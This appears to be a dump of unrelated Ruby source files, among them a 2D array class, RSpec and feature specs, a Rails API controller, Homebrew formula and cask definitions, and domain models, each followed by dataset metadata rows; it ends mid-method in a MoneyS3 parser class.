# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "google/cloud/video_intelligence/v1beta1/video_intelligence_service_client"
| 45.333333 | 83 | 0.780882 |
381649185a0ba39e2ecf9fece05d7f8e870d8830 | 3,156 | class Array2D
include Enumerable
attr_accessor :state
def initialize(rows, columns, value=nil)
@state = Array.new(rows) { Array.new(columns) { value } }
end
def each(&block)
@state.each do |row|
row.each do |e|
yield e
end
end
end
def each_with_index(&block)
@state.each_with_index do |row, row_index|
row.each_with_index do |e, column_index|
yield e, [row_index, column_index]
end
end
end
def to_s
@state.to_s
end
def ==(o)
o.class == self.class && o.state == state
end
def size
[row_size, column_size]
end
def row_size
@state.size
end
def column_size
@state[0].size
end
def [](x, y)
case x
when Integer
case y
when Integer
@state[x][y]
when Range
if y.size <= column_size
subarray = Array.new(y.to_a.size)
y.each {|yi| subarray[yi - y.first] = @state[x][yi]}
subarray
else
raise IndexError, "Indices are out of range"
end
end
when Range
case y
when Integer
if x.size <= row_size
subarray = Array.new(x.to_a.size)
x.each {|xi| subarray[xi - x.first] = @state[xi][y]}
subarray
else
raise IndexError, "Indices are out of range"
end
when Range
if x.size <= row_size && y.size <= column_size
subarray = Array2D.new(x.to_a.size, y.to_a.size)
x.each do |xi|
y.each do |yi|
subarray.state[xi - x.first][yi - y.first] = @state[xi][yi]
end
end
subarray
else
raise IndexError, "Indices are out of range"
end
end
end
end
def []=(x, y, value)
case x
when Integer
case y
when Integer
@state[x][y] = value
when Range
if value.is_a?(Array) && y.size == value.size
y.each {|yi| @state[x][yi] = value[yi - y.first]}
elsif value.is_a?(Array) && y.size != value.size
raise AssignmentError, "Value array is not the same size as subarray"
else
y.each {|yi| @state[x][yi] = value}
end
end
when Range
case y
when Integer
if value.is_a?(Array) && x.size == value.size
x.each {|xi| @state[xi][y] = value[xi - x.first]}
elsif value.is_a?(Array) && x.size != value.size
raise AssignmentError, "Value array is not the same size as subarray"
else
x.each {|xi| @state[xi][y] = value}
end
when Range
x.each do |xi|
y.each do |yi|
if value.is_a?(Array2D) && [x.size, y.size] == value.size
@state[xi][yi] = value[xi - x.first, yi - y.first]
elsif value.is_a?(Array2D) && [x.size, y.size] != value.size
raise AssignmentError, "Value 2d array is not the same size as subarray"
else
@state[xi][yi] = value
end
end
end
end
end
end
end
class IndexError < StandardError; end
class AssignmentError < StandardError; end | 24.276923 | 86 | 0.534537 |
1cda566e8d998bdbb0d09a31886ba7386d46c1e9 | 95 | Rails.application.routes.draw do
mount ViewComponentKit::Engine => "/view_component_kit"
end
| 23.75 | 57 | 0.8 |
1ab0e1f387c7f691c5a2264a5bbec7c9a49003d4 | 3,136 | module Cheffish
module RSpec
module RepositorySupport
def when_the_repository(desc, *tags, &block)
context("when the chef repo #{desc}", *tags) do
include_context "with a chef repo"
extend WhenTheRepositoryClassMethods
module_eval(&block)
end
end
::RSpec.shared_context "with a chef repo" do
before :each do
raise "Can only create one directory per test" if @repository_dir
@repository_dir = Dir.mktmpdir("chef_repo")
Chef::Config.chef_repo_path = @repository_dir
%w{client cookbook data_bag environment node role user}.each do |object_name|
Chef::Config.delete("#{object_name}_path".to_sym)
end
end
after :each do
if @repository_dir
begin
%w{client cookbook data_bag environment node role user}.each do |object_name|
Chef::Config.delete("#{object_name}_path".to_sym)
end
Chef::Config.delete(:chef_repo_path)
FileUtils.remove_entry_secure(@repository_dir)
ensure
@repository_dir = nil
end
end
Dir.chdir(@old_cwd) if @old_cwd
end
def directory(relative_path, &block)
old_parent_path = @parent_path
@parent_path = path_to(relative_path)
FileUtils.mkdir_p(@parent_path)
instance_eval(&block) if block
@parent_path = old_parent_path
end
def file(relative_path, contents)
filename = path_to(relative_path)
dir = File.dirname(filename)
FileUtils.mkdir_p(dir) unless dir == "."
File.open(filename, "w") do |file|
raw = case contents
when Hash, Array
JSON.pretty_generate(contents)
else
contents
end
file.write(raw)
end
end
def symlink(relative_path, relative_dest)
filename = path_to(relative_path)
dir = File.dirname(filename)
FileUtils.mkdir_p(dir) unless dir == "."
dest_filename = path_to(relative_dest)
File.symlink(dest_filename, filename)
end
def path_to(relative_path)
File.expand_path(relative_path, (@parent_path || @repository_dir))
end
def cwd(relative_path)
@old_cwd = Dir.pwd
Dir.chdir(path_to(relative_path))
end
module WhenTheRepositoryClassMethods
def directory(*args, &block)
before :each do
directory(*args, &block)
end
end
def file(*args, &block)
before :each do
file(*args, &block)
end
end
def symlink(*args, &block)
before :each do
symlink(*args, &block)
end
end
def path_to(*args, &block)
before :each do
file(*args, &block)
end
end
end
end
end
end
end
| 29.037037 | 91 | 0.544643 |
bbb9f52eb7931576ffa22473690d36e7f0448516 | 5,599 | # frozen_string_literal: true
RSpec.describe RuboCop::Cop::Rails::ContentTag, :config do
context 'Rails 5.0', :rails50 do
it 'does not register an offense' do
expect_no_offenses(<<~RUBY)
content_tag(:p, 'Hello world!')
RUBY
end
it 'does not register an offense with empty tag' do
expect_no_offenses(<<~RUBY)
content_tag(:br)
RUBY
end
it 'does not register an offense with array of classnames' do
expect_no_offenses(<<~RUBY)
content_tag(:div, "Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offense with nested content_tag' do
expect_no_offenses(<<~RUBY)
content_tag(:div) { content_tag(:strong, 'Hi') }
RUBY
end
end
context 'Rails 5.1', :rails51 do
it 'corrects an offence' do
expect_offense(<<~RUBY)
content_tag(:p, 'Hello world!')
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag.p('Hello world!')
RUBY
end
it 'corrects an offence with empty tag' do
expect_offense(<<~RUBY)
content_tag(:br)
^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag.br()
RUBY
end
it 'corrects an offence with array of classnames' do
expect_offense(<<~RUBY)
content_tag(:div, "Hello world!", class: ["strong", "highlight"])
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag.div("Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'corrects an offence with nested content_tag' do
expect_offense(<<~RUBY)
content_tag(:div) { content_tag(:strong, 'Hi') }
^^^^^^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag.div() { tag.strong('Hi') }
RUBY
end
it 'corrects an offence when first argument is hash' do
expect_offense(<<~RUBY)
content_tag({foo: 1})
^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag({foo: 1})
RUBY
end
it 'corrects an offence when first argument is non-identifier string' do
expect_offense(<<~RUBY)
content_tag('foo-bar', 'baz', class: 'strong')
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag.foo_bar('baz', class: 'strong')
RUBY
end
it 'corrects an offense when called with options hash and block' do
expect_offense(<<~RUBY)
content_tag :div, { class: 'strong' } do
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
'body'
end
RUBY
expect_correction(<<~RUBY)
tag.div({ class: 'strong' }) do
'body'
end
RUBY
end
it 'does not register an offence when `tag` is used with an argument' do
expect_no_offenses(<<~RUBY)
tag.p('Hello world!')
RUBY
end
it 'does not register an offence when `tag` is used without arguments' do
expect_no_offenses(<<~RUBY)
tag.br
RUBY
end
it 'does not register an offence when `tag` is used with arguments' do
expect_no_offenses(<<~RUBY)
tag.div("Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offence when `tag` is nested' do
expect_no_offenses(<<~RUBY)
tag.div() { tag.strong('Hi') }
RUBY
end
it 'does not register an offense when `content_tag` is called with no arguments' do
expect_no_offenses(<<~RUBY)
content_tag
RUBY
end
context 'when the first argument is a variable' do
it 'does not register an offence when the first argument is a lvar' do
expect_no_offenses(<<~RUBY)
name = do_something
content_tag(name, "Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offence when the first argument is an ivar' do
expect_no_offenses(<<~RUBY)
content_tag(@name, "Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offence when the first argument is a cvar' do
expect_no_offenses(<<~RUBY)
content_tag(@@name, "Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offence when the first argument is a gvar' do
expect_no_offenses(<<~RUBY)
content_tag($name, "Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offence when the first argument is a splat argument' do
expect_no_offenses(<<~RUBY)
content_tag(*args, &block)
RUBY
end
end
context 'when the first argument is a method' do
it 'does not register an offence' do
expect_no_offenses(<<~RUBY)
content_tag(name, "Hello world!", class: ["strong", "highlight"])
RUBY
end
end
context 'when the first argument is a constant' do
it 'does not register an offence' do
expect_no_offenses(<<~RUBY)
content_tag(CONST, "Hello world!", class: ["strong", "highlight"])
RUBY
end
end
end
end
| 29.010363 | 109 | 0.567066 |
e211481baa947bbc543c50d3f8a6344c023865c1 | 1,908 | module Api
class CloudVolumesController < BaseController
include Subcollections::Tags
def create_resource(_type, _id = nil, data = {})
ext_management_system = ExtManagementSystem.find(data['ems_id'])
klass = CloudVolume.class_by_ems(ext_management_system)
raise BadRequestError, klass.unsupported_reason(:create) unless klass.supports?(:create)
task_id = klass.create_volume_queue(session[:userid], ext_management_system, data)
action_result(true, "Creating Cloud Volume #{data['name']} for Provider: #{ext_management_system.name}", :task_id => task_id)
rescue => err
action_result(false, err.to_s)
end
def edit_resource(type, id, data = {})
raise BadRequestError, "Must specify an id for editing a #{type} resource" unless id
cloud_volume = resource_search(id, type, collection_class(:cloud_volumes))
raise BadRequestError, cloud_volume.unsupported_reason(:update) unless cloud_volume.supports?(:update)
task_id = cloud_volume.update_volume_queue(User.current_user, data)
action_result(true, "Updating #{cloud_volume.name}", :task_id => task_id)
rescue => err
action_result(false, err.to_s)
end
def safe_delete_resource(type, id, _data = {})
api_resource(type, id, "Deleting") do |cloud_volume|
ensure_supports(type, cloud_volume, :safe_delete)
{:task_id => cloud_volume.safe_delete_volume_queue(User.current_userid)}
end
end
def delete_resource_main_action(_type, cloud_volume, _data)
# TODO: ensure_supports(type, cloud_volume, :delete)
{:task_id => cloud_volume.delete_volume_queue(User.current_userid)}
end
def options
if (id = params["id"])
render_update_resource_options(id)
elsif (ems_id = params["ems_id"])
render_create_resource_options(ems_id)
else
super
end
end
end
end
| 36 | 131 | 0.705451 |
5d46778d96c148c46fcc72deda7bf3efed05bae0 | 1,418 | class Dolt < Formula
desc "Git for Data"
homepage "https://github.com/liquidata-inc/dolt"
url "https://github.com/dolthub/dolt/archive/v0.22.8.tar.gz"
sha256 "baf41ca21fd2f7ab239ca27245a5e22152206db6e141cbf2329624199556f4fd"
license "Apache-2.0"
livecheck do
url :stable
strategy :github_latest
end
bottle do
cellar :any_skip_relocation
sha256 "bbd6ba6959b8d58d9ed958a66d9ebe02f6a1991fea9b354344ca215cce0bba02" => :big_sur
sha256 "1763b29a40f623a2ce9f100075121f42a4f63fa5f65108f0ac59389853170907" => :arm64_big_sur
sha256 "ae300ba99d43583e99ffbdb3bb0a5ae52da1017d16626f353807fdb340e9de71" => :catalina
sha256 "fc4b0864a5142a8ebd91c1b4ae3195df5a1360b27d0ba939feb12a03d2286f0e" => :mojave
end
depends_on "go" => :build
def install
chdir "go" do
system "go", "build", *std_go_args, "./cmd/dolt"
system "go", "build", *std_go_args, "-o", bin/"git-dolt", "./cmd/git-dolt"
system "go", "build", *std_go_args, "-o", bin/"git-dolt-smudge", "./cmd/git-dolt-smudge"
end
end
test do
ENV["DOLT_ROOT_PATH"] = testpath
mkdir "state-populations" do
system bin/"dolt", "init", "--name", "test", "--email", "test"
system bin/"dolt", "sql", "-q", "create table state_populations ( state varchar(14), primary key (state) )"
assert_match "state_populations", shell_output("#{bin}/dolt sql -q 'show tables'")
end
end
end
| 34.585366 | 113 | 0.705219 |
089a8b784b2ce7bdff0d0bbc2244183ec76411e2 | 39 | class TagDecorator < DecoratorBase
end
| 13 | 34 | 0.846154 |
21ecb8a8598b6017c9d4868bb80c4acfbc92fff9 | 1,115 | #!/usr/bin/env ruby
require 'facets'
require 'andand'
require 'commander'
require 'colorize'
require 'terminal-table'
require 'chronic_duration'
require_relative './ext'
class App
include Commander::Methods
module Commands
end
INDENT = 2
class << self
def command(name, &block)
@commands ||= []
@commands << {
name: name,
type: :command,
block: block,
}
end
def alias_command(name, *args)
@commands ||= {}
@commands << {
name: name,
type: :alias,
args: args,
}
end
def commands
return @commands || {}
end
end
def run
program :name, 'docker-tools'
program :version, '0.0.1'
program :description, 'Docker tools'
self.class.commands.each do |info|
case info[:type]
when :command
command info[:name] do |*args|
instance_exec(*args, &info[:block])
end
when :alias
alias_command(info[:name], *info[:args])
else
throw "Unsupport command type #{info[:type]} for command #{info[:name]}"
end
end
run!
end
end
require_relative './ps'
require_relative './inspect'
App.new.run if $0 == __FILE__
| 16.15942 | 77 | 0.632287 |
038406b578c963ad781e6e06ced05fba6d71c8ff | 497 | # frozen_string_literal: true
module Mj
module AlternativeFile
class Resolver
def initialize
@stack = []
end
def add(resolver)
@stack.push(resolver)
end
def resolve(file)
file = AlternativeFile::CurrentFile.new(file.to_s)
resolved = []
@stack.each do |resolver|
resolved.push(resolver.resolve(file))
end
AlternativeFile::Candidates.new(resolved.flatten.compact)
end
end
end
end
| 18.407407 | 65 | 0.603622 |
797879d077ec008988e91dcfac9e125bec486b24 | 202 | # frozen_string_literal: true
class Todo < ActiveRecord::Model
attributes title: '', completed: false
scope(:completed) { where(completed: true) }
scope(:active) { where(completed: false) }
end
| 22.444444 | 46 | 0.717822 |
4abdbcb939c0e985c302d5c8262909f990f52fbc | 1,691 | class KSTable
include DRbUndumped
attr_accessor :row, :context, :rollback_buffer, :rollback_hash
def pending_deletion?
@deletion
end
def read_only?
@read_only
end
alias :read_only :read_only?
def read_only=(cond)
@read_only = cond ? true : false
end
def serialized?
@serialized
end
def set_pending_deletion
@deletion = true
end
def reset_pending_deletion
@deletion = false
end
def set_serialized
@serialized = true
end
def initialize
@row = {}
@rollback_buffer = []
@rollback_hash = {}
@serialized = false
@pending_deletion = false
@read_only = false
end
def load(row, context = nil, read_only = false)
@row, @context, @read_only = row, context, read_only
self
end
def key
result = self.class.primaries.collect{|f| @row[f.to_s]}
end
def changed
@context.changed(self) if defined?(@context) && @context
end
def table_name
self.class.table_name
end
def inspect
table_name + @row.inspect
end
def delete # TODO: Add a cascade_delete that deletes the row plus any to_many relations to the row.
if @context.autocommit?
@context.delete_one(self)
else
set_pending_deletion
changed
nullify_self
end
end
def nullify_self
@rollback_buffer.push self.dup
@row.each_key do |key|
@rollback_hash[key] ||= []
@rollback_hash[key].push @row[key]
end
@row = {}
end
# Unwind the changes.
def rollback
@rollback_buffer.reverse.each do |rbval|
if Array === rbval
@row[rbval[0]] = rbval[1]
else
@row = rbval.row
reset_pending_deletion
end
end
@rollback_buffer.clear
@rollback_hash.each_key do |key|
@rollback_hash[key].clear
end
end
end
| 16.417476 | 100 | 0.690124 |
1aeae5174af05be7abf35dd90d0dc486e6fe16ee | 7,844 | # frozen_string_literal: true
RSpec.feature "ColocatedTask", :all_dbs do
let(:vlj_support_staff) { create(:user) }
before { Colocated.singleton.add_user(vlj_support_staff) }
describe "attorney assigns task to vlj support staff, vlj returns it to attorney after completion" do
let(:judge_user) { create(:user) }
let!(:vacols_judge) { create(:staff, :judge_role, sdomainid: judge_user.css_id) }
let(:attorney_user) { create(:user) }
let!(:vacols_atty) { create(:staff, :attorney_role, sdomainid: attorney_user.css_id) }
let(:root_task) { create(:root_task) }
let(:appeal) { root_task.appeal }
let!(:atty_task) do
create(
:ama_attorney_task,
appeal: appeal,
parent: root_task,
assigned_by: judge_user,
assigned_to: attorney_user
)
end
let(:return_instructions) { "These are the instructions from the VLJ" }
it "should return attorney task to active state" do
# Attorney assigns task to VLJ support staff.
User.authenticate!(user: attorney_user)
visit("/queue/appeals/#{appeal.uuid}")
find(".Select-control", text: "Select an action…").click
find("div", class: "Select-option", text: Constants.TASK_ACTIONS.ADD_ADMIN_ACTION.to_h[:label]).click
# Redirected to assign colocated action page
action = Constants.CO_LOCATED_ADMIN_ACTIONS.poa_clarification
find(".Select-control", text: "Select an action").click
find("div", class: "Select-option", text: action).click
fill_in(COPY::ADD_COLOCATED_TASK_INSTRUCTIONS_LABEL, with: "note")
find("button", text: COPY::ADD_COLOCATED_TASK_SUBMIT_BUTTON_LABEL).click
# Redirected to personal queue page. Assignment succeeds.
expect(page).to have_content("You have assigned an administrative action (#{action})")
# Visit case details page for VLJ support staff.
User.authenticate!(user: vlj_support_staff)
visit("/queue/appeals/#{appeal.uuid}")
# Return case to attorney.
find(".Select-control", text: "Select an action…").click
find("div", class: "Select-option", text: Constants.TASK_ACTIONS.COLOCATED_RETURN_TO_ATTORNEY.to_h[:label]).click
fill_in("instructions", with: return_instructions)
find("button", text: COPY::MARK_TASK_COMPLETE_BUTTON).click
# Redirected to personal queue page. Return to attorney succeeds.
expect(page).to have_content(
format(COPY::MARK_TASK_COMPLETE_CONFIRMATION, appeal.veteran.name.formatted(:readable_full))
)
# View attorney personal queue page. Should see appeal in assigned active queue.
User.authenticate!(user: attorney_user)
visit("/queue")
# Click into case details page.
click_on(appeal.veteran.name.formatted(:readable_full))
# verify that the instructions from the VLJ appear on the case timeline
expect(page).to have_css("h2", text: "Case Timeline")
scroll_to(find("h2", text: "Case Timeline"))
poa_task = PoaClarificationColocatedTask.find_by(assigned_to_type: User.name)
click_button(COPY::TASK_SNAPSHOT_VIEW_TASK_INSTRUCTIONS_LABEL, id: poa_task.id)
expect(page).to have_content(return_instructions)
# Expect to see draft decision option.
find(".Select-control", text: "Select an action…").click
expect(page).to have_content(Constants.TASK_ACTIONS.REVIEW_AMA_DECISION.to_h[:label])
# ColocatedTask assigned to organization should have status completed.
expect(atty_task.children.first.status).to eq(Constants.TASK_STATUSES.completed)
end
end
describe "vlj support staff places the task on hold" do
let(:root_task) { create(:root_task) }
let(:appeal) { root_task.appeal }
let(:veteran_name) { appeal.veteran.name.formatted(:readable_full) }
context "when ColocatedTask is in progress" do
let(:hold_duration_days) { 15 }
let!(:colocated_task) do
create(
:ama_colocated_task,
appeal: appeal,
parent: root_task
)
end
let(:individual_task) { colocated_task.children.first }
it "is successfully placed on hold" do
# Visit case details page for VLJ support staff.
User.authenticate!(user: vlj_support_staff)
visit("/queue/appeals/#{appeal.uuid}")
# Attempt to put the task on hold.
click_dropdown(text: Constants.TASK_ACTIONS.PLACE_TIMED_HOLD.label)
# Modal appears.
expect(page).to have_content(Constants.TASK_ACTIONS.PLACE_TIMED_HOLD.label)
# Attempt to place the task on hold without including notes.
find(".Select-control", text: COPY::COLOCATED_ACTION_PLACE_HOLD_LENGTH_SELECTOR_LABEL).click
find("div", class: "Select-option", text: "#{hold_duration_days} days").click
click_on(COPY::MODAL_SUBMIT_BUTTON)
# Instructions field is required
expect(page).to have_content(COPY::FORM_ERROR_FIELD_REQUIRED)
# Add instructions and try again
fill_in("instructions", with: "some text")
click_on(COPY::MODAL_SUBMIT_BUTTON)
# We should see a success message and remain on the case details page.
expect(page).to have_content(
format(COPY::COLOCATED_ACTION_PLACE_HOLD_CONFIRMATION, veteran_name, hold_duration_days)
)
expect(page).to have_current_path("/queue/appeals/#{appeal.uuid}")
# Task snapshot updated with new hold information
expect(page).to have_content("0 of #{hold_duration_days}")
end
end
end
describe "vlj support staff changes task type" do
let(:root_task) { create(:root_task) }
let(:appeal) { root_task.appeal }
let!(:colocated_task) do
create(
:ama_colocated_task,
:other,
appeal: appeal,
parent: root_task,
assigned_to: vlj_support_staff
)
end
let(:new_task_type) { IhpColocatedTask }
it "should update the task type" do
# Visit case details page for VLJ support staff.
User.authenticate!(user: vlj_support_staff)
visit "/queue"
click_on "#{appeal.veteran_full_name} (#{appeal.veteran_file_number})"
# Navigate to the change task type modal
find(".Select-control", text: COPY::TASK_ACTION_DROPDOWN_BOX_LABEL).click
find("div", class: "Select-option", text: Constants.TASK_ACTIONS.CHANGE_TASK_TYPE.to_h[:label]).click
expect(page).to have_content(COPY::CHANGE_TASK_TYPE_SUBHEAD)
# Ensure all admin actions are available
find(".Select-control", text: "Select an action type").click do
visible_options = page.find_all(".Select-option")
expect(visible_options.length).to eq Constants::CO_LOCATED_ADMIN_ACTIONS.length
end
# Attempt to change task type without including instuctions.
find("div", class: "Select-option", text: new_task_type.label).click
find("button", text: COPY::CHANGE_TASK_TYPE_SUBHEAD).click
# Instructions field is required
expect(page).to have_content(COPY::FORM_ERROR_FIELD_REQUIRED)
# Add instructions and try again
instructions = generate_words(5)
fill_in("instructions", with: instructions)
find("button", text: COPY::CHANGE_TASK_TYPE_SUBHEAD).click
# We should see a success message but remain on the case details page
expect(page).to have_content(
format(
COPY::CHANGE_TASK_TYPE_CONFIRMATION_TITLE,
Constants::CO_LOCATED_ADMIN_ACTIONS.values.last,
new_task_type.label
)
)
# Ensure the task has been updated
expect(page).to have_content(format("TASK\n%<label>s", label: new_task_type.label))
page.find("#currently-active-tasks button", text: COPY::TASK_SNAPSHOT_VIEW_TASK_INSTRUCTIONS_LABEL).click
expect(page).to have_content(instructions)
end
end
end
| 40.854167 | 119 | 0.692504 |
396a15a4e291fad41f00a8ac4092999d1e48a466 | 714 | module Fog
module Compute
class Google
class Mock
def add_url_map_path_matchers(url_map, path_matchers)
Fog::Mock.not_implemented
end
end
class Real
def add_url_map_path_matchers(url_map, path_matchers)
api_method = @compute.url_maps.update
parameters = {
'project' => @project,
'urlMap' => url_map.name
}
if url_map.pathMatchers then
url_map.pathMatchers.concat(path_matchers)
else
url_map.pathMatchers = path_matchers
end
request(api_method, parameters, body_object=url_map)
end
end
end
end
end
| 23.8 | 62 | 0.572829 |
b9e00ff7d626c5a4800d57ecbdee8026fb53a025 | 7,687 | require 'activefacts/api'
module CinemaTickets
class AddressText < Text
value_type
end
class Address
identified_by :address_text
one_to_one :address_text, mandatory: true # Address has Address Text, see AddressText#address
end
class CinemaID < AutoCounter
value_type
end
class Name < String
value_type
end
class Cinema
identified_by :cinema_id
one_to_one :cinema_id, mandatory: true, class: CinemaID # Cinema has Cinema ID, see CinemaID#cinema_as_cinema_id
one_to_one :name, mandatory: true # Cinema has Name, see Name#cinema
end
class SectionName < String
value_type
end
class Section
identified_by :section_name
one_to_one :section_name, mandatory: true # Section has Section Name, see SectionName#section
end
class AllocatableCinemaSection
identified_by :cinema, :section
has_one :cinema, mandatory: true # AllocatableCinemaSection involves Cinema, see Cinema#all_allocatable_cinema_section
has_one :section, mandatory: true # AllocatableCinemaSection involves Section, see Section#all_allocatable_cinema_section
end
class BookingNr < SignedInteger
value_type length: 32
end
class CollectionCode < SignedInteger
value_type length: 32
end
class Number < UnsignedInteger
value_type length: 16
end
class EncryptedPassword < String
value_type
end
class PersonID < AutoCounter
value_type
end
class Person
identified_by :person_id
one_to_one :person_id, mandatory: true, class: PersonID # Person has Person ID, see PersonID#person_as_person_id
has_one :encrypted_password # Person has Encrypted Password, see EncryptedPassword#all_person
one_to_one :login_name, class: Name # Person has login-Name, see Name#person_as_login_name
end
class FilmID < AutoCounter
value_type
end
class YearNr < SignedInteger
value_type length: 32
end
class Year
identified_by :year_nr
one_to_one :year_nr, mandatory: true # Year has Year Nr, see YearNr#year
end
class Film
identified_by :film_id
one_to_one :film_id, mandatory: true, class: FilmID # Film has Film ID, see FilmID#film_as_film_id
has_one :name, mandatory: true # Film has Name, see Name#all_film
has_one :year # Film was made in Year, see Year#all_film
end
class Day < SignedInteger
value_type length: 32
end
class Hour < SignedInteger
value_type length: 32
end
class Minute < SignedInteger
value_type length: 32
end
class MonthNr < SignedInteger
value_type length: 32
end
class Month
identified_by :month_nr
one_to_one :month_nr, mandatory: true # Month has Month Nr, see MonthNr#month
end
class SessionTime
identified_by :year, :month, :day, :hour, :minute
has_one :year, mandatory: true # Session Time is in Year, see Year#all_session_time
has_one :month, mandatory: true # Session Time is in Month, see Month#all_session_time
has_one :day, mandatory: true # Session Time is on Day, see Day#all_session_time
has_one :hour, mandatory: true # Session Time is at Hour, see Hour#all_session_time
has_one :minute, mandatory: true # Session Time is at Minute, see Minute#all_session_time
end
class Session
identified_by :cinema, :session_time
has_one :cinema, mandatory: true # Session involves Cinema, see Cinema#all_session
has_one :session_time, mandatory: true # Session involves Session Time, see SessionTime#all_session
maybe :is_high_demand # Is High Demand
maybe :uses_allocated_seating # Uses Allocated Seating
has_one :film, mandatory: true # Session involves Film, see Film#all_session
end
class Booking
identified_by :booking_nr
one_to_one :booking_nr, mandatory: true # Booking has Booking Nr, see BookingNr#booking
maybe :tickets_for_booking_have_been_issued # Tickets For Booking Have Been Issued
has_one :number, mandatory: true # Booking involves Number, see Number#all_booking
has_one :person, mandatory: true # Booking involves Person, see Person#all_booking
has_one :session, mandatory: true # Booking involves Session, see Session#all_booking
has_one :address # tickets for Booking are being mailed to Address, see Address#all_booking
has_one :collection_code # Booking has Collection Code, see CollectionCode#all_booking
has_one :section # Booking is for seats in Section, see Section#all_booking
end
class HighDemand < Boolean
value_type
end
class PaymentMethodCode < String
value_type
end
class PaymentMethod
identified_by :payment_method_code
one_to_one :payment_method_code, mandatory: true # Payment Method has Payment Method Code, see PaymentMethodCode#payment_method
end
class PlacesPaid
identified_by :booking, :payment_method
has_one :booking, mandatory: true # Places Paid involves Booking, see Booking#all_places_paid
has_one :payment_method, mandatory: true # Places Paid involves Payment Method, see PaymentMethod#all_places_paid
has_one :number, mandatory: true # Places Paid involves Number, see Number#all_places_paid
end
class Price < Money
value_type
end
class RowNr < Char
value_type length: 2
end
class Row
identified_by :cinema, :row_nr
has_one :cinema, mandatory: true # Row is in Cinema, see Cinema#all_row
has_one :row_nr, mandatory: true # Row has Row Nr, see RowNr#all_row
end
class SeatNumber < UnsignedInteger
value_type length: 16
end
class Seat
identified_by :row, :seat_number
has_one :row, mandatory: true # Seat is in Row, see Row#all_seat
has_one :seat_number, mandatory: true # Seat has Seat Number, see SeatNumber#all_seat
has_one :section # Seat is in Section, see Section#all_seat
end
class SeatAllocation
identified_by :booking, :allocated_seat
has_one :booking, mandatory: true # Seat Allocation involves Booking, see Booking#all_seat_allocation
has_one :allocated_seat, mandatory: true, class: Seat # Seat Allocation involves allocated-Seat, see Seat#all_seat_allocation_as_allocated_seat
end
class TicketPricing
identified_by :session_time, :cinema, :section, :high_demand
has_one :session_time, mandatory: true # Ticket Pricing involves Session Time, see SessionTime#all_ticket_pricing
has_one :cinema, mandatory: true # Ticket Pricing involves Cinema, see Cinema#all_ticket_pricing
has_one :section, mandatory: true # Ticket Pricing involves Section, see Section#all_ticket_pricing
has_one :high_demand, mandatory: true # Ticket Pricing involves High Demand, see HighDemand#all_ticket_pricing
has_one :price, mandatory: true # Ticket Pricing involves Price, see Price#all_ticket_pricing
end
end
| 38.435 | 156 | 0.661767 |
1c9b7cb41c2adff92c8675d8a109bcec5edea216 | 72 | class Crypto::AlertSubscription < Common::AlertSubscriptionNotifier
end
| 24 | 67 | 0.861111 |
08592d0d4788f907a89d6a4673d1bb07b96c6355 | 41 | include_recipe 'role-balanced-commander'
| 20.5 | 40 | 0.853659 |
f79c29513d36adb28175399c7185f8f620b3742b | 435 | cask "4k-stogram" do
version "3.0.7.3300"
sha256 "4bfb52578517e40a2176a7666b05dd32d2baf35af8e41800380469b9b139415f"
url "https://dl.4kdownload.com/app/4kstogram_#{version.major_minor_patch}.dmg"
appcast "https://www.4kdownload.com/download"
name "4K Stogram"
homepage "https://www.4kdownload.com/products/product-stogram"
depends_on macos: ">= :sierra"
app "4K Stogram.app"
zap trash: "~/Pictures/4K Stogram"
end
| 27.1875 | 80 | 0.749425 |
ab7e1d81fff2fdb2ee0de39378dd78f393ac5cf0 | 111 | $LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "panos/phpipam"
require "minitest/autorun"
| 22.2 | 58 | 0.747748 |
e836e1a4cb351241bfd7e34069ece760c16427e3 | 160 | module Tak
class Game
def initialize(size)
@tak_board = Tak::Board.new(size)
@turn = :white
@first_move = true
end
end
end
| 16 | 40 | 0.56875 |
f773520248a65e0274cefc6b4ce487e3aa54988b | 1,626 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2019_01_01
module Models
#
# Sampling settings for Diagnostic.
#
class SamplingSettings
include MsRestAzure
# @return [SamplingType] Sampling type. Possible values include: 'fixed'
attr_accessor :sampling_type
# @return [Float] Rate of sampling for fixed-rate sampling.
attr_accessor :percentage
#
# Mapper for SamplingSettings class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'SamplingSettings',
type: {
name: 'Composite',
class_name: 'SamplingSettings',
model_properties: {
sampling_type: {
client_side_validation: true,
required: false,
serialized_name: 'samplingType',
type: {
name: 'String'
}
},
percentage: {
client_side_validation: true,
required: false,
serialized_name: 'percentage',
constraints: {
InclusiveMaximum: 100,
InclusiveMinimum: 0
},
type: {
name: 'Double'
}
}
}
}
}
end
end
end
end
| 26.655738 | 78 | 0.52214 |
f7c2354ac11e2fe78690ce01ef8d5d4a1ae16fdd | 10,265 | module MoneyS3
module Parsers
class BanDoklType
include ParserCore::BaseParser
def vydej
at 'Vydej'
end
def vydej_attributes
